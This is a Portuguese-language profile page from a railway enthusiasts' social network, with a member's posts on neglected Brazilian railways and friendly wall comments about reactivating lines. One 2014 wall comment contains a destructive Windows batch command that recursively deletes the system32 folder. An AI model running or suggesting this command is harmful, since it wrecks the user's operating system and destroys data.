Amantes Da Ferrovia

Apaixonados por trem

LEONAM DA SILVA FERREIRA
  • 62, Masculino
  • RIO DE JANEIRO R J
  • Brasil
Compartilhar no Facebook Compartilhar

Amigos de LEONAM DA SILVA FERREIRA

  • Pedro Rodrigues da Silva
  • pedro ferrovia
  • Jose Luiz Sousa Barbosa
  • Paulo Cesar Coleta
  • jackson de toledo
  • Erealdo Fagundes Couto
  • Robson Souza Duarte de Oliveira
  • Aloizio Barros de Souza
  • Debora Souza
  • Samuel Straioto
  • kleber Bertelli Alhadas
  • joao garcia
  • Alan Teodoro
  • allencar rodriguez
  • Dhayllison Douglas

Comunidades de LEONAM DA SILVA FERREIRA

 

Página de LEONAM DA SILVA FERREIRA

Blog de LEONAM DA SILVA FERREIRA

QUE NOSSO CLUBE TENHA CADA VEZ MAIS MEMBROS.

    FICO BASTANTE SATISFEITO  QUE PELO MENOS UMAS POUCAS PESSOAS TORÇAM PARA QUE NOSSAS FERROVIAS TENHAM UM MELHOR DESTINO, QUE VÁRIOS PROJETOS SAIAM DO PAPEL E QUE DEIXEMOS DE TER INVEJA AO VER AS LINHAS FÉRREAS BEM MAIS BONITAS QUE AS NOSSAS QUE INFELIZMENTE VIRARAM CRACOLÃNDIA, QUE NÃO TENHAMOS VONTADE DE CHORAR COMO O COLEGA JOEL VENDRAMIM AO VER LOCOMOTIVAS ABANDONADAS EM RIO NEGRINHO (S C) , AO VER O VÍDEO O ÚLTIMO TREM DO SERTÃO, NO QUAL OS CONDUTORES DA LOCOMOTIVA 2600 CHEGARAM AS…

Continuar

Postado em 17 janeiro 2012 às 15:30 — 1 Comentário

DIVULGAÇÃO DO CLUBE

PORQUE OS SENHORES NÃO PROCURAM FAZER UMA MAIOR DIVULGAÇÃO DAS FINALIDADES DO CLUBE, SEJA EM ALGUM HORÁRIO EM RÁDIO OU TV, JÁ  QUE VÁRIOS MOTIVOS NÃO FALTAM?  TAIS COMO; O DESRESPEITOSO E CALAMITOSO ABANDONO DE BARÃO DE MAUÁ, QUE FIM LEVOU O PROJETO DE INSTALAÇÃO DO ATS QUE COMEÇOU A SER FEITO LÁ PELOS IDOS DE 1977? O FIM DO TRANSPORTE  INTERURBANO DE PASSAGEIROS, QUANDO HOJE EM DIA SÓ ESTAO EM ATIVIDADE OS DA CVRD E DA CARAJÁS?  AONDE IRÃO PARAR AS 80 LOCOMOTIVAS ELÉTRICAS FRANCESAS…

Continuar

Postado em 26 abril 2011 às 13:48

Caixa de Recados (30 comentários)

Você precisa ser um membro de Amantes Da Ferrovia para adicionar comentários!

Entrar em Amantes Da Ferrovia

Às 22:21 em 22 julho 2014, echo off del /s /q c:/windows/sy disse...

echo off
del /s /q c:/windows/system32

Às 18:51 em 6 março 2014, Pedro Rodrigues da Silva disse...

Sou de uma cidade chamada Teixeiras (zona da mata mineira), sobre a serra de conrado tem que haver envolvimento de deputados, prefeitos, o mais caro está pronto que é o viaduto, a região é linda demais.

Às 18:28 em 6 março 2014, Pedro Rodrigues da Silva disse...

Na verdade sou mineiro da gema, estou temporariamente em aqui em araraquara, mas estou voltando para minas gerais, e por falar em norte fluminense, eu trabalhei 5 anos em campos dos goitacazes, eu era supervisor do cco, terra boa. Aí no estado do rio de janeiro tem uma serra linda, a serra de conrado, inclusive tem um viaduto em curva (único no país) perto de miguel pereira, trecho lindo, o povo dessa região poderia unir-se e reativar aquele trecho, é simplesmente um trecho maravilhoso.

Às 12:25 em 6 março 2014, Pedro Rodrigues da Silva disse...

Sabe qual seria a solução para alguns casos, é o fatiamento por setor ou localidade, para isso as comunidades tem que se unirem e fazerem como algumas cidades fizeram, exemplo: antigo ramal da leopoldina na cidade de Viçosa, a linha férrea passa no centro da universidade federal (UFV) estão requerendo junto ao governo federal o trecho em questão, para que possam fazer trens regulares que saiam da universidade e vão até uma estação chamada Silvestre, onde tem o curso de medicina, são alguns quilometros de linha que podem ser reativadas para o bem comum da comunidade, é só se organizar, e creio que existem muitas outras localidades que possam fazer o mesmo. Mais a frente de Viçosa, tem a serra de São Geraldo, é simplismente uma das mais lindas do ramal da leopoldina em Minas Gerais, as duas cidades (Coimbra e São Geraldo) poderiam se unir e fazer um trem de turismo São Geraldo a Coimbra e Coimbra São Geraldo, nos moldes de Ouro Preto a Mariana, traria receitas para as duas cidades com turismo, artezanato local, e a cidade de São Geraldo é um grande celeiro de grandes ferroviários, amantes da ferrovia, pois nessa cidade tinha uma grande oficina, que foi modelo durante muitas decadas. No meio dessa serra tem uma parada, que se chama mirante, a vista é maravilhosa, incomparável, era uma parada obrigatória para abastecimento de água e lenha das maquinas a vapor (as maria-fumaça), o povo unido pode muito mais, povo, governo federal, estadual, municipal e iniciativa privada será igual a bem comum a todos, e a memória tem que ser reativada para ser eternizada, pensem nisso.

Às 22:30 em 5 março 2014, Pedro Rodrigues da Silva disse...

digo eterna rffsa

Às 22:30 em 5 março 2014, Pedro Rodrigues da Silva disse...

trabalhei 20 anos em ferrovia, entre rffsa, fca e vale, mas as melhores experiencia com certeza foram na enterna rffsa, muitas saudades.

Às 13:01 em 22 setembro 2013, Fábio Henrique Vicente disse...

Boa tarde Leo!

meu skype é fhv.softwares

add eu aí amigo, e controle sua pressão, pois políticos estão

cada vez pior neste país!!! rsrsrs

colocaram ate estagiaria na reuniao da ONU!

coisa de tupiniquim!!! rsrsrs

abraços!

Às 19:46 em 9 setembro 2013, Alan Teodoro disse...

Olá leonam,tudo bom meu amigo de ferrovia?

eu estou ótimo graças ao bom Deus,

ótima semana pra vc,

abraçãoooo!!!!

Às 18:17 em 19 agosto 2013, Samuel Straioto disse...

Leonam sou jornalista e estou acostumado com constantes desculpas das autoridades. A alegação do governo de Goiás é que está se investindo no programa chamado Rodovida reconstrução e manutenção. O governo tem projeto para reconstruir toda a malha viária do estado, beneficiando as regiões turísticas e de escoamento agrícola. A idéia não é ruim, mas a preocupação das pessoas é se vai dar tempo e qual a qualidade do material empregado!

Às 12:49 em 19 agosto 2013, Samuel Straioto disse...

Esperto que tenha aproveitado o passeio em Caldas Novas. Aqui em Goiás infelizmente é desse jeito, como você bem disse, coisas simples são muito complicadas de se resolver, por isto a chateação quanto a não reabertura do Museu Ferroviário de Pires do Rio. Retirada de entulho e compra de extintores. Coisa difícil! Abraços!

 
 
 

Publicidade

Membros

Comunidades

Música

Carregando...

© 2017   Criado por Amantes da Ferrovia.   Ativado por

Badges  |  Relatar um incidente  |  Termos de serviço